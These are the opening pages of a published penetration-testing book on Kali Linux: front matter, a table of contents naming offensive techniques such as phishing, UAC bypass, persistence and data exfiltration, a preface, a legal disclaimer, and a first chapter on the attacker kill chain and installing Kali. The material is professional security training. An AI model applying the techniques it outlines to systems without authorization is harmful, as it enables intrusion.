Mastering Kali Linux for Advanced Penetration Testing

Third Edition

Secure your network with Kali Linux 2019.1 - the ultimate white hat hackers' toolkit



www.packt.com

Vijay Kumar Velu and Robert Beggs

Mastering Kali Linux for Advanced Penetration Testing *Third Edition*

Secure your network with Kali Linux 2019.1 – the ultimate white hat hackers' toolkit

Vijay Kumar Velu Robert Beggs



BIRMINGHAM - MUMBAI

Mastering Kali Linux for Advanced Penetration Testing Third Edition

Copyright © 2019 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author(s), nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Vijin Boricha Acquisition Editor: Rohit Rajkumar Content Development Editor: Deepti Thore Technical Editor: Rudolph Almeida Copy Editor: Safis Editing Project Coordinator: Jagdish Prabhu Proofreader: Safis Editing Indexer: Tejal Daruwale Soni Graphics: Jisha Chirayil Production Coordinator: Nilesh Mohite

First published: June 2014 Second edition: June 2017 Third edition: January 2019

Production reference: 1290119

Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK.

ISBN 978-1-78934-056-3

www.packtpub.com

I would like to dedicate this book to the opensource community and all the security enthusiasts. I would take the opportunity to thank my mother (Gowri), sister (Kalaivani), Brother (Manjunath) and my father (Velu) for believing in me and always encouraging me to do whatever I wanted to. Thanks to Packt Publishing for all the support that they provided throughout the journey of this book, and my friends (Hackerz) and my colleagues Brad, Rich and Anuj for the support. Special thanks to my mentor Dani Michaux – Vijay Kumar Velu



mapt.io

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

- Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals
- Improve your learning with Skill Plans built especially for you
- Get a free eBook or video every month
- Mapt is fully searchable
- Copy and paste, print, and bookmark content

Packt.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.packt. com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub.com for more details.

At www.packt.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.

Contributors

About the author

Vijay Kumar Velu is a passionate information security practitioner, author, speaker, investor, and blogger. He has more than 12 years of IT industry experience, is a licensed penetration tester, and is specialized in providing technical solutions to a variety of cyber problems, ranging from simple security configuration reviews to cyber threat intelligence. Vijay holds multiple security qualifications, including CEH, ECSA, and CHFI. He has authored a couple of books on penetration testing: *Mastering Kali Linux for Advanced Penetration Testing – Second Edition*, and *Mobile Application Penetration Testing*. For the community, Vijay serves as chair member in NCDRC, India. Out of work, he enjoys playing music and doing charity work.

Robert Beggs is the founder and CEO of DigitalDefence, a Canadian-focused company that specializes in preventing and responding to information security incidents. Robert is a security practitioner with more than 15 years of experience. He has been responsible for the technical leadership and project management of more than 300 consulting engagements, including policy development and review, standards compliance, penetration testing of wired and wireless networks, third party security assessments, incident response and data forensics, and other consulting projects. Previously, he provided security services for a major Canadian financial institution and Netigy, a global network and security infrastructure firm based in San Jose.

About the reviewer

Kunal Sehgal has been heading critical cyber security roles for financial organizations for over 15 years now. He is an avid blogger and a regular speaker on cyber-related topics across Asia. He also holds a bachelor's degree in computer applications from Panjab University, and a post-graduate diploma from Georgian College in cyber space security. He has numerous cyber certifications, including Certified Information Systems Auditor (CISA), Certified Information Systems Security Professional (CISSP), Certified Information Security Manager (CISM), Tenable Certified Nessus Auditor (TCNA), Certificate of Cloud Security Knowledge (CCSK), ISO 27001 Lead Auditor, Offensive Security Certified Professional (OSCP), and CompTIA Security+.

Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.c om and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Table of Contents

Title Page Copyright and Credits Mastering Kali Linux for Advanced Penetration Testing Third Edition Dedication About Packt Why subscribe? Packt.com Contributors About the author About the reviewer Packt is searching for authors like you Preface Who this book is for What this book covers To get the most out of this book Download the example code files Download the color images Conventions used Get in touch Reviews Disclaimer 1. Goal-Based Penetration Testing Conceptual overview of security testing Misconceptions of vulnerability scanning, penetration testing, and red team exe rcises Objective-based penetration testing The testing methodology Introduction to Kali Linux – features Role of Kali in red team tactics Installing and updating Kali Linux Using as a portable device Installing Kali to Raspberry Pi 3 Installing Kali onto a VM VMware Workstation Player VirtualBox Installing to a Docker Appliance Kali on AWS Cloud Organizing Kali Linux

Configuring and customizing Kali Linux

Resetting the root password

Adding a non-root user

Configuring network services and secure communications

Adjusting network proxy settings

Accessing the secure shell

Speeding up Kali operations

Sharing folders with the host operating system

Using Bash scripts to customize Kali Building a verification lab Installing defined targets

Metasploitable3

Mutillidae

Setting up an Active Directory and Domain Controller

Adding users to the Active Directory

Adding Metasploitable3 Windows to the new domain

Managing collaborative penetration testing using Faraday

Summary

2. Open Source Intelligence and Passive Reconnaissance Basic principles of reconnaissance

Open source intelligence

Offensive OSINT

Domain gathering using Sublist3r

Maltego

OSRFramework

Web archives

Scraping

Gathering usernames and email addresses

Obtaining user information

Shodan and censys.io

Google Hacking Database

Using dork scripts to query Google

Data dump sites

Using scripts to automatically gather OSINT data Defensive OSINT

Dark web

Security breaches

Threat intelligence

Profiling users for password lists Creating custom wordlists for cracking passwords

Using CeWL to map a website

Extracting words from Twitter using twofi

Summary

3. Active Reconnaissance of External and Internal Networks Stealth scanning strategies

Adjusting source IP stack and tool identification settings

Modifying packet parameters

Using proxies with anonymity networks DNS reconnaissance and route mapping

The whois command (Post GDPR) Employing comprehensive reconnaissance applications The recon-ng framework

IPv4

IPv6

Using IPv6-specific tools

Mapping the route to the target

Identifying the external network infrastructure

Mapping beyond the firewall

IDS/IPS identification Enumerating hosts

Live host discovery Port, operating system, and service discovery

Port scanning Writing your own port scanner using netcat

Fingerprinting the operating system

Determining active services

Large-scale scanning

DHCP information

Identification and enumeration of internal network hosts

Native MS Windows commands

ARP broadcasting

Ping sweep

Using scripts to combine masscan and nmap scans

Taking advantage of SNMP

Windows account information via SMB (Server Message Block) sessions

Locating network shares

Reconnaissance of active directory domain servers

Using comprehensive tools (SPARTA)

An example to configure SPARTA

Summary

4. Vulnerability Assessment

Vulnerability nomenclature

Local and online vulnerability databases

Vulnerability scanning with Nmap

Introduction to Lua scripting

Customizing NSE scripts Web application vulnerability scanners

Introduction to Nikto and Vega

Customizing Nikto and Vega

Vulnerability scanners for mobile applications The OpenVAS network vulnerability scanner

Customizing OpenVAS Commercial vulnerability scanners

Nessus

Nexpose

Specialized scanners

Threat modeling

Summary

5. Advanced Social Engineering and Physical Security Methodology and attack methods Technology

Computer-based

Mobile-based

People-based

Physical attacks

Voice-based Physical attacks at the console

samdump2 and chntpw

Sticky keys Creating a rogue physical device Microcomputer or USB-based attack agents

The Raspberry Pi

The MalDuino – the BadUSB The Social Engineering Toolkit (SET)

Using a website attack vector – the credential harvester attack me $% \left({{{\mathbf{x}}_{\mathbf{x}}} \right)$

thod

Using a website attack vector – the tabnabbing attack method

HTA attack

Using the PowerShell alphanumeric shellcode injection attack

Hiding executables and obfuscating the attacker's URL Escalating an attack using DNS redirection

Spear phishing attack

Setting up a phishing campaign with Gophish

Launching a phishing attack

Using bulk transfer as a mode of phishing

Summary

6. Wireless Attacks

```
Configuring Kali for wireless attacks
Wireless reconnaissance
```

Kismet

Bypassing a hidden SSID

Bypassing the MAC address authentication and open authentication Attacking WPA and WPA2 $% \left({\left| {{{\rm{AC}}} \right|_{{\rm{AC}}}} \right)$

Brute-force attacks

Attacking wireless routers with Reaver

Denial-of-service (DoS) attacks against wireless communications

Compromising enterprise implementations of WPA/WPA2

Working with Ghost Phisher

Summary

7. Exploiting Web-Based Applications

Web application hacking methodology

The hacker's mind map Reconnaissance of web apps

Detection of web application firewall and load balancers

Fingerprinting a web application and CMS

Mirroring a website from the command line

Client-side proxies

Burp Proxy

Web crawling and directory brute-force attacks

Web service-specific vulnerability scanners Application-specific attacks

Brute-forcing access credentials Injection

OS command injection using commix

SQL injection

XML injection

Bit-flipping attack

Maintaining access with web shells

Summary

8. Client-Side Exploitation

Backdooring executable files Attacking a system using hostile scripts

Conducting attacks using VBScript

Attacking systems using Windows PowerShell

The Cross-Site Scripting framework The Browser Exploitation Framework (BeEF)

Configuring the BeEF Understanding BeEF Browser Integrating BeEF and Metasploit attacks

Using BeEF as a tunneling proxy

Summary

9. Bypassing Security Controls

Bypassing Network Access Control (NAC) Pre-admission NAC

> Adding new elements Identifying the rules

> > Exceptions

Quarantine rules Disabling endpoint security

Preventing remediation

Adding exceptions

Post-admission NAC

Bypassing isolation

Detecting honeypot Bypassing the antivirus with files

Using the Veil framework

Using Shellter

Going fileless and evading antivirus Bypassing application-level controls Tunneling past client-side firewalls using SSH

Inbound to outbound

Bypassing URL filtering mechanisms

Outbound to inbound Bypassing Windows operating system controls

> User Account Control (UAC) Using fileless techniques

> > Using fodhelper to bypass UAC in Windows 10

Using Disk Cleanup to bypass UAC in Windows 10 Other Windows-specific operating system controls

Access and authorization

Encryption

System security

Communications security

Auditing and logging

Summary

10. Exploitation The Metasploit Framework

Libraries

REX

Framework core

Framework base

Interfaces

Modules

Database setup and configuration Exploiting targets using MSF

Single targets using a simple reverse shell

Single targets using a reverse shell with a PowerShell attack vector

Exploiting multiple targets using MSF resource files

Exploiting multiple targets with Armitage Using public exploits

Locating and verifying publicly available exploits Compiling and using exploits

Compiling C files

 $\label{eq:Adding the exploits that are written using the MSF as a base \\ \ensuremath{\mathsf{Developing}}\xspace a \ensuremath{\mathsf{Windows}}\xspace exploit \\ \ensuremath{\mathsf{MSF}}\xspace a \ensurema$

Identifying a vulnerability using fuzzing

Creating a Windows-specific exploit

Summary

11. Action on the Objective and Lateral Movement Activities on the compromised local system

> Conducting rapid reconnaissance of a compromised system Finding and taking sensitive data – pillaging the target

Creating additional accounts Post-exploitation tools

The Metasploit Framework

The Empire project

CrackMapExec Horizontal escalation and lateral movement

Veil-Pillage

Compromising domain trusts and shares PsExec, WMIC, and other tools

WMIC

Windows Credential Editor

Lateral movement using services Pivoting and port forwarding

Using Proxychains

Summary

12. Privilege Escalation

Overview of the common escalation methodology

Escalating from domain user to system administrator

Local system escalation Escalating from administrator to system

DLL injection Credential harvesting and escalation attacks

Password sniffers

Responder

SMB relay attacks

Escalating access rights in Active Directory

Compromising Kerberos – the golden-ticket attack

Summary

13. Command and Control

Persistence

Using persistent agents

Employing Netcat as a persistent agent

Using schtasks to configure a persistent task

Maintaining persistence with the Metasploit framework

Using the persistence script

Creating a standalone persistent agent with Metasploit Persistence using online file storage cloud services

Dropbox

Microsoft OneDrive

Domain fronting

Using Amazon CloudFront for C2

Using Microsoft Azure for C2

Exfiltration of data

Using existing system services (Telnet, RDP, and VNC)

Using the DNS protocol

Using the ICMP protocol

Using the Data Exfiltration Toolkit (DET)

Using PowerShell

Hiding evidence of an attack

Summary

14. Embedded Devices and RFID Hacking Embedded systems and hardware architecture Embedded system basic architecture

Understanding firmware

Different types of firmware

Understanding bootloaders

Common tools

Firmware unpacking and updating

Introduction to RouterSploit Framework

UART

Cloning RFID using Chameleon Mini

Other tools

Summary

Other Books You May Enjoy

Leave a review - let other readers know what you think

Preface

This book is dedicated to the use of Kali Linux in performing penetration tests against networks, systems, and applications. A penetration test simulates an attack against a network or a system by a malicious outsider or insider. Unlike a vulnerability assessment, penetration testing is designed to include the exploitation phase. Therefore, it proves that the exploit is present, and that it is accompanied by the very real risk of being compromised if not acted upon.



Throughout this book, we will refer to penetration testers, attackers, and hackers interchangeably, as they use the same techniques and tools to assess the security of networks and data systems. The only difference between them is their end objective—a secure data network, or a data breach.

In short, this book will take you through a journey of penetration testing, with a number of proven techniques for defeating the latest network defenses using Kali Linux, from selecting the most effective tools, to rapidly compromising network security, to highlighting the techniques used to avoid detection.

Who this book is for

If you are a penetration tester, IT professional, or security consultant wanting to maximize the success of your network testing by using some of the advanced features of Kali Linux, then this book is for you. Some prior exposure to the basics of penetration testing and ethical hacking would be helpful in making the most out of this title.

What this book covers

chapter 1, *Goal-Based Penetration Testing with Kali Linux*, introduces a functional outline, based on the penetration-testing methodology, that will be used throughout the book. It ensures that a coherent and comprehensive approach to penetration testing will be followed.

chapter 2, Open Source Intelligence and Passive Reconnaissance, provides background on how to gather information about a target using publicly-available sources, and discusses the tools that can simplify reconnaissance and information management.

chapter 3, Active Reconnaissance of the External and Internal Networks, introduces you to stealthy approaches that can be used to gain information about the target, especially the information that identifies vulnerabilities to be exploited.

chapter 4, *Vulnerability Assessment*, teaches you the semi-automated process of scanning a network and its devices to locate systems that are vulnerable to attack and compromise, and the process of taking all reconnaissance and vulnerability scan information, assessing it, and then creating a map to guide the penetration-testing process.

chapter 5, Advanced Social Engineering and Physical Security, demonstrates why being able to physically access a system or interact with the humans who manage it provides the most successful route to exploitation.

chapter 6, *Wireless Attacks*, provides a brief explanation of wireless technologies, and focuses instead on the common techniques used to compromise these networks by bypassing security.

chapter 7, *Exploiting Web-Based Applications*, provides a brief overview of one of the most complex delivery phases to secure: web-based applications that are exposed to the public internet.

chapter 8, *Client-Side Exploitation*, focuses on attacks against applications on the

end user's systems, which are frequently not protected to the same degree as the organization's primary network.

chapter 9, *Bypassing Security Controls*, demonstrates the most common security controls in place, identifies a systematic process for overcoming these controls, and demonstrates this using the tools from the Kali toolset.

chapter 10, *Exploitation*, demonstrates the methodologies that can be used to find and execute exploits that allow a system to be compromised by an attacker.

chapter 11, Action on the Objective, focuses on the immediate post-exploit activities, as well as the concept of horizontal escalation—the process of using an exploited system as a starting point to jump off to other systems on the network.

chapter 12, *Privilege Escalation*, demonstrates how the penetration tester can own all aspects of a system's operations, and more importantly, how obtaining some access privileges will allow the tester to control all systems across a network.

chapter 13, *Command and Control*, focuses on what a modern attacker would do to enable data to be exfiltrated to the attacker's location, while hiding the evidence of the attack.

chapter 14, *Embedded Devices and RFID Hacking*, focuses on what a modern attacker would do to perform a structured attack on embedded devices, as well as the cloning of NFC cards, to achieve an objective.

To get the most out of this book

In order to practice the material presented in this book, you will need virtualization tools such as VMware or VirtualBox.

You will need to download and configure the Kali Linux operating system and its suite of tools. To ensure that it is up to date and that you have all of the tools, you will need an internet connection.

Sadly, not all of the tools on the Kali Linux system will be addressed, since there are just too many of them. The focus of this book is not to overwhelm you with all of the tools and options, but to provide an approach for testing that will give you the opportunity to learn and incorporate new tools as your experiences and knowledge increases over time.

Although most of the examples from this book focus on Microsoft Windows, the methodology and most of the tools are transferable to other operating systems, such as Linux and the other flavors of Unix.

Finally, this book applies Kali to complete the attacker's kill-chain against target systems. For this, you will need a target operating system. Many of the examples in the book use Microsoft Windows 7 and Windows 2008 R2.

Download the example code files

You can download the example code files for this book from your account at www. packt.com. If you purchased this book elsewhere, you can visit www.packt.com/support and register to have the files emailed directly to you.

You can download the code files by following these steps:

- 1. Log in or register at www.packt.com.
- 2. Select the SUPPORT tab.
- 3. Click on Code Downloads & Errata.
- 4. Enter the name of the book in the Search box and follow the onscreen instructions.

Once the file is downloaded, please make sure that you unzip or extract the folder using the latest version of:

- WinRAR/7-Zip for Windows
- Zipeg/iZip/UnRarX for Mac
- 7-Zip/PeaZip for Linux

The code bundle for the book is also hosted on GitHub at https://github.com/PacktPu blishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition. In Case there's an update to the code, it will be updated on the existing GitHub repository.

We also have other code bundles from our rich catalog of books and videos available at https://github.com/PacktPublishing/. Check them out!

Download the color images

We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/files/downloads/9781789340563_ColorImages.pdf.

Conventions used

There are a number of text conventions used throughout this book.

codeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "For example, we have used the netcat command."

A block of code is set as follows:

```
<!DOCTYPE foo [ <!ENTITY Variable "hello" > ]><somexml><message>&Variable;</message>
```

Any command-line input or output is written as follows:

```
|chmod 600 privatekey.pem
|ssh -i privatekey.pem ec2-user@amazon-dns-ip
```

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "Right-click on the folder and select the Sharing tab. From this menu, select Share."



Warnings or important notes appear like this.

Tips and tricks appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at customercare@packtpub.com.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packt.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at copyright@packt.com with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packt.com.

Disclaimer

The information within this book is intended to be used only in an ethical manner. Do not use any information from the book to perform illegal activities if you do not have written permission from the owner of the equipment. If you perform illegal actions, you are likely to be arrested and prosecuted to the full extent of the law. Packt Publishing does not take any responsibility if you misuse any of the information contained within the book. The information herein must only be used while testing environments with proper written authorizations from appropriate persons responsible.

The features explained in the book are based on the meta-packages version of Kali Linux 2019.1, this is not the official release by Offensive Security.

Goal-Based Penetration Testing

Everything starts with a goal. In this chapter, we will discuss the importance of goal-based penetration testing with a set of objectives and discuss misconceptions and how a typical vulnerability scan, penetration testing, and red teaming exercise can fail without the importance of a goal. This chapter also provides an overview of security testing and setting up a verification lab and focuses on customizing Kali to support some advanced aspects of penetration testing. By the end of this chapter, you'll have learned the following:

- An overview of security testing
- Misconceptions of vulnerability scanning, penetration testing, and red teaming exercises
- History and purpose of Kali Linux
- Updating and organizing Kali
- Setting up defined targets
- Building a verification lab

Conceptual overview of security testing

Every household, individual and public and private business in the world has something to worry about in cyber space, such as privacy, data loss, malware, cyber terrorism, and identity theft. Everything starts with a concept of protection; if you ask the question *"What is security testing?"* to 100 different security consultants, it is very likely that you'll hear different responses. In the simplest form, security testing is a process to determine that any information asset or system is protected and its functionality is maintained as intended.

Misconceptions of vulnerability scanning, penetration testing, and red team exercises

In this section, we will discuss some misconceptions and limitations on traditional/classical vulnerability scanning, penetration testing, and red teaming exercises. Let's now understand the actual meaning of all of these three in simple terms and their limitations:

- Vulnerability scanning (Vscan): It is a process of identifying vulnerabilities or security loopholes in a system or network. One of the misconceptions about Vscan is that it will let you know all of the known vulnerabilities; well, it's not true. Limitations with Vscan are only potential vulnerabilities and it purely depends on the type of scanner that one utilizes; it might also include lots of false positives and, to the business owner, there is no clear vision on whether they are relevant risks or not and which one will be utilized by the attackers first to gain access.
- **Penetration testing (Pentest)**: It is a process of safely exploiting vulnerabilities without much impact to the existing network or business. There is a lower number of false positives since the testers will try and simulate the exploit. Limitations with the pentest are only currently known, publicly available exploits and mostly these are project-focused testing. We often hear from pentesters during an assessment, "*Yay! Got Root*"—but we never question: *What's next?* This could be due to various reasons, such as the project limits you to report the high-risk issues immediately to the client or the client is interested in only one segment of the network and wants you to test that.

0

One of the misconceptions about the pentest is that it provides the full attacker view of the network and you are safe once you've done a penetration testing. Well, it isn't the case if attackers found a vulnerability in the business process of your secure app.

• **Red Team Exercise (RTE):** It is a process of evaluating the effectiveness of an organization to defend against cyber threats and improve its security by any possible means; during an RTE, we can notice multiple ways of

achieving project objectives and goals, such as complete coverage of activities with the defined project goal, including phishing, wireless, disk drops (USB, CD, and SSD), and physical penetration testing. The limitations with RTEs are time-bound, pre-defined scenarios and an assumed rather than real environment. Often, the RTE is run with a fully monitored mode for every technique and tactics are executed according to the procedure, but this isn't the case when a real attacker wants to achieve an objective.

Often, all three different testing methodologies refer to the term *hack* or *compromise*. We will hack your network and show you where your weaknesses are; but wait, does the client or business owner understand the term *hack* or *compromise*? How do we measure it? What are the criteria? And when do we know that the hack or compromise is complete? All the questions point to only one thing: what's the primary goal?

Objective-based penetration testing

The primary goal of a pentest/RTE is to determine the real risk, differentiating the risk rating from the scanner and giving a business risk value for each asset, along with the brand image of the organization. It's not about whether how much risk they have; rather, it's about how much they are exposed. A threat that has been found does not really constitute a risk and need not be demonstrated. For example, a **Cross-Site Scripting (XSS)** on a brochure website may not have significant impact on the business; however, a client might accept the risk to put in a mitigation plan using a **Web Application Firewall (WAF)** to prevent the XSS attacks.

While objective-based penetration testing is time-based, depending on the specific problem that an organization faces, an example of an objective is: *We are most worried about the online portal and fraud transactions*. So, the objective now is to compromise the portal or administrators through phishing or take over the approval chains through a system flaw. Every objective comes with its own tactics, techniques, and procedures that will support the primary goal of the penetration test activity. We will be exploring all of the different ways throughout this book using Kali Linux.
The testing methodology

Methodologies rarely consider why a penetration test is being undertaken or which data is critical to the business and needs to be protected. In the absence of this vital first step, penetration tests lose focus.

Many penetration testers are reluctant to follow a defined methodology, fearing that it'll hinder their creativity in exploiting a network. Penetration testing fails to reflect the actual activities of a malicious attacker. Frequently, the client wants to see whether you can gain administrative access to a particular system (*Can you root the box?*). However, the attacker may be focused on copying critical data in a manner that does not require root access or cause a denial of service.

To address the limitations inherent in formal testing methodologies, they must be integrated in a framework that views the network from the perspective of an attacker, the **kill chain**.

In 2009, Mike Cloppert of Lockheed Martin CERT introduced the concept that is now known as the **attacker kill chain**. This includes the steps taken by an adversary when they are attacking a network. It does not always proceed in a linear flow as some steps may occur in parallel. Multiple attacks may be launched over time at the same target, and overlapping stages may occur at the same time.

In this book, we've modified Cloppert's kill chain to more accurately reflect how attackers apply these steps when exploiting networks, application, and data services.

The following diagram shows a typical kill chain of an attacker:



A typical kill chain of an attacker can be described as follows:

- Explore or reconnaissance phase: The adage, *reconnaissance time is never wasted time*, adopted by most military organizations, acknowledges that it is better to learn as much as possible about an enemy before engaging them. For the same reason, attackers will conduct extensive reconnaissance of a target before attacking. In fact, it is estimated that at least 70 percent of the work effort of a penetration test or an attack is spent conducting reconnaissance! Generally, they will employ two types of reconnaissance:
 - **Passive:** This does not directly interact with the target in a hostile manner. For example, the attacker will review the publicly available website(s), assess online media (especially social media sites), and attempt to determine the **attack surface** of the target. One particular task will be to generate a list of past and current employee names. These names will form the basis of attempts to brute force or guess passwords. They will also be used in social engineering attacks. This type of reconnaissance is difficult, if not impossible, to distinguish from the behavior of regular users.
 - Active: This can be detected by the target but it can be difficult to distinguish most online organizations' faces from the regular backgrounds. Activities occurring during active reconnaissance include physical visits to target premises, port scanning, and remote vulnerability scanning.

- **Delivery phase**: Delivery is the selection and development of the weapon that will be used to complete the exploit during the attack. The exact weapon chosen will depend on the attacker's intent as well as the route of delivery (for example, across the network, via wireless, or through a webbased service). The impact of the delivery phase will be examined in the second half of this book.
- Exploit or compromise phase: This is the point when a particular exploit is successfully applied, allowing attackers to reach their objective. The compromise may have occurred in a single phase (for example, a known operating system vulnerability was exploited using a buffer overflow), or it may have been a multiphase compromise (for example, an attacker physically accessed premises to steal a corporate phone book. The names were used to create lists for brute force attacks against a portal logon. In addition, emails were sent to all employees to click on an embedded link to download a crafted PDF file that compromised their computers). Multiphase attacks are the norm when a malicious attacker targets a specific enterprise.
- Achieve phase Action on the Objective: This is frequently, and incorrectly, referred to as the exfiltration phase because there is a focus on perceiving attacks solely as a route to steal sensitive data (such as login information, personal information, and financial information); it is common for an attacker to have a different objective. For example, a business may wish to cause a denial of service in their competitor's network to drive customers to their own website. Therefore, this phase must focus on the many possible actions of an attacker. One of the most common exploit activity occurs when the attackers attempt to improve their access privileges to the highest possible level (vertical escalation) and to compromise as many accounts as possible (horizontal escalation).
- Achieve phase Persistence: If there is value in compromising a network or system, then that value can likely be increased if there is persistent access. This allows attackers to maintain communications with a compromised system. From a defender's point of view, this is the part of the kill chain that is usually the easiest to detect.

Kill chains are metamodels of an attacker's behavior when they attempt to compromise a network or a particular data system. As a metamodel, it can incorporate any proprietary or commercial penetration testing methodology. Unlike the methodologies, however, it ensures a strategic-level focus on how an attacker approaches the network. This focus on the attacker's activities will guide the layout and content of this book.

Introduction to Kali Linux – features

Kali Linux (Kali) is the successor to the BackTrack penetration testing platform that is generally regarded as the de facto standard package of tools used to facilitate penetration testing to secure data and voice networks. It was developed by Mati Aharoni and Devon Kearns of Offensive Security.

In **2018,** Kali had four major releases—as of December 2018. The Kali 2018.1 release was on **Feb 6 2018** with kernel 4.14.13 and Gnome 3.26.2. The Kali 2018.2 rolling release was on **April 30 2018** with Kernel 4.15 that beats the Spectre and meltdown vulnerabilities on x64 and x86 machines, and Kali 2018.3 on **August 21 2018** just after the Hacker summer camp. This brings the kernel version to 4.17.0 with minimal addition to the kernel and the final release Kali 2018.4 for the year was on **Oct 29 2018** with an experimental Raspberry Pi 3 image that supports 64 bit mode and updated packages of other tools.

Some features of the latest Kali include the following:

- Over 500 advanced penetration testing, data forensics, and defensive tools are included. The majority of the tools are eliminated and replaced by similar tools. They provide extensive wireless support with multiple hardware and kernel patches to permit the packet injection required by some wireless attacks.
- Support for multiple desktop environments such as KDE, GNOME3, Xfce, MATE, e17, lxde, and i3wm.
- By default, Kali Linux has Debian-compliant tools that are synchronized with the Debian repositories at least four times daily, making it easier to update packages and apply security fixes.
- There are secure Development Environment and GPG signed packages and repositories.
- There's support for ISO customization, allowing users to build their own versions of customized Kali with a limited set of tools, to make it lightweight. The bootstrap function also performs enterprise-wide network installs that can be automated using pre-seed files.
- Since ARM-based systems have become more prevalent and less expensive, the support for **ARMEL** and **ARMHF** in Kali to be installed on devices

such as rk3306 mk/ss808, Raspberry Pi, ODROID U2/X2, Samsung Chromebook, EfikaMX, Beaglebone Black, CuBox, and Galaxy Note 10.1 was introduced.

• Kali always remains an open source project that is free. Most importantly, it is well supported by an active online community.

Role of Kali in red team tactics

While pentesters can prefer any type of operating system to perform their desired activity, usage of Kali Linux saves significant time and prevents the need to search for packages that aren't typically available for other operating systems. Some of the advantages that are not noticed with Kali during a red team are the following:

- One single source to attack various platforms
- Quick to add sources and install packages and supporting libraries (especially those that are not available for Windows)
- Possible to install even the RPM packages with the usage of alien

The purpose of Kali Linux is to secure things and bundle all of the tools to provide a single platform for penetration testers.

Installing and updating Kali Linux

In the last edition, we focused on the installation of Kali Linux to VMware player, VirtualBox, and Amazon AWS and using the Docker appliance. In this section, we will touch base on installing on the same platforms along with Raspberry Pi 3.

Using as a portable device

It is fairly simple to install Kali Linux onto a portable device. In some situations, clients do not permit the use of an external laptop inside a secure facility. In those cases, typically a testing laptop is provided by the client to the pentester to perform the scan. Running Kali Linux from a portable device has more advantages during a pentest or RTE:

- It's in the pocket, in case of a USB or mobile device
- It can be run live without making any changes to the host operating system
- You can customize the build of Kali Linux and you can even make the storage persistent

There are a simple three steps to make a USB into a portable Kali from a Windows PC:

- Download the official Kali Linux image from: http://docs.kali.org/introductio n/download-official-kali-linux-images.
- 2. Download Win32 Disk Imager from: https://sourceforge.net/projects/win32diski mager/. We will be using Win32 Disk Imager 1.0.
- 3. Open the Win32 Disk Imager as administrator. Plug the USB drive into the PC's available USB port. Browse to the location where you've downloaded your image. You should be able to see what's shown in the following screenshot. Select the right drive name and then click Write:

| 눻 Win32 Disk | lmager - 1.0 | | - | - [| ı × |
|-------------------------|--------------------|-----------|-------------|-----|----------|
| Image File | | | | | Device |
| D:/Hacktools/ka | ali-linux-2018.2- | amd64.iso | | 2 | [G:\] 🔻 |
| Hash MD5 🔻 | Generate | Сору | | | |
| Read Only / Progress | Allocated Partitio | ns | | | |
| | | | | | 7% |
| Cancel | Read | Write | Verify Only | | Exit |
| .32601MB/s | | | | 00: | 18/04:22 |

Once complete, exit the Win32 Disk Imager and safely remove the USB. The Kali Linux is now ready as a portable device to be plugged into any laptop to boot it up live. It is also possible to generate a hash value using the Win32 Disk Imager. If your host operating system is Linux this can be achieved by two standard commands:

```
sudo fdisk -l
```

This will display all of the disks mounted on the drive:

```
dd if=kali linux.iso of=/dev/nameofthedrive bs=512k
```

That's it. The dd command-line utility does the convert and copy, if is used for input file , of is for output file, and bs is for the block size.

Installing Kali to Raspberry Pi 3

Raspberry Pis are single board devices that are compact in nature and can run just like a fully loaded computer with minimal functionalities. These devices are extremely useful during RTE and penetration testing activities. The base of the operating system is loaded from a SD card just like a hard disk drive for normal computers/laptops.

The same steps as those outlined in the previous section, *Using as a portable device*, can be performed on a high speed SD card that can be plugged into a Raspberry Pi. We are ready to use the system without any issues. If the installation is successful, the following screen must be present when Kali Linux is booted from a Raspberry Pi. We've used Raspberry Pi 3 for this demonstration and accessed the Pi Operating system using VNC viewer:



Installing Kali onto a VM

In this section, we will take a quick tour of how to install Kali onto VMware Workstation Player and Oracle VirtualBox.

VMware Workstation Player

VMware Workstation Player, formerly known as VMware Player, is free for personal use and a commercial product for business use from VMware as a desktop application that allows us to run a VM inside your host operating system. This application can be downloaded from: https://my.vmware.com/en/web/vmwa re/free#desktop_end_user_computing/vmware_workstation_player/12_0.

We will be using version 12.5.9 VMware Workstation Player. Once the installer is downloaded, go ahead and install the VMware Player accordingly, based on your host operating system. If the installation is complete, you should have the following screen:



